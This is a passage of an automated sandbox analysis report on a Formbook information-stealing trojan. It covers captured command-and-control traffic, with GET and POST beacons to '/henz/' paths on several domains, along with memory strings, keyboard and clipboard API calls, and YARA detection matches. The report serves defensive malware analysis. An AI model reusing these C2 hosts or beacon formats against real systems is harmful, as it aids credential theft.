4hq=uKJ3qgoQjSSIl72SWRbxmJfyb-CHZadDqFjxHXw93iCfjbeERT92LYSE3AM8c3aZg8CKmGjjDF19Cq3i516b4LacAZL1wzExwpyVHRkbOS~qA3XaJ7k7btmEK8nE53toV7lVr6PIBTWwX9vFbGgL~HpGEtO-sr35~7QgKdrHAtH4lG~BWg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:55:23 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 
61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:31 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 
30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:33 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/html
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:26:01 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=c570c0e56952311d05e6ddd9a42f969d; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 869Content-Type: text/html; charset=UTF-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:26:03 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=642acd1bd4e5af4738220f65563c7d37; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
          Source: help.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.119.101.137/ak_Address/Address.js
          Source: help.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
          Source: help.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
          Source: Lc8xQv8iZY.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Lc8xQv8iZY.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.348880659.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.323170503.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.368664553.0000000008260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: -ODfqI49.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: help.exe, 00000005.00000002.569785642.0000000004302000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: help.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?d0766413c666e394f861185086d7f52f
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: help.exe, 00000005.00000002.569622242.0000000003B28000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.lyonfinancialusa.com/henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs
          Source: unknownHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
          Source: unknownDNS traffic detected: queries for: www.eufidelizo.com
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1Host: www.brennancorps.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1Host: www.lopezmodeling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1Host: www.foxwhistle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,1_2_004050C0
          Source: Lc8xQv8iZY.exe, 00000000.00000002.312089969.00000000006BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00404020 GetKeyboardState,1_2_00404020
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405125

          E-Banking Fraud

          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: hvbvmxm.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: help.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Lc8xQv8iZY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
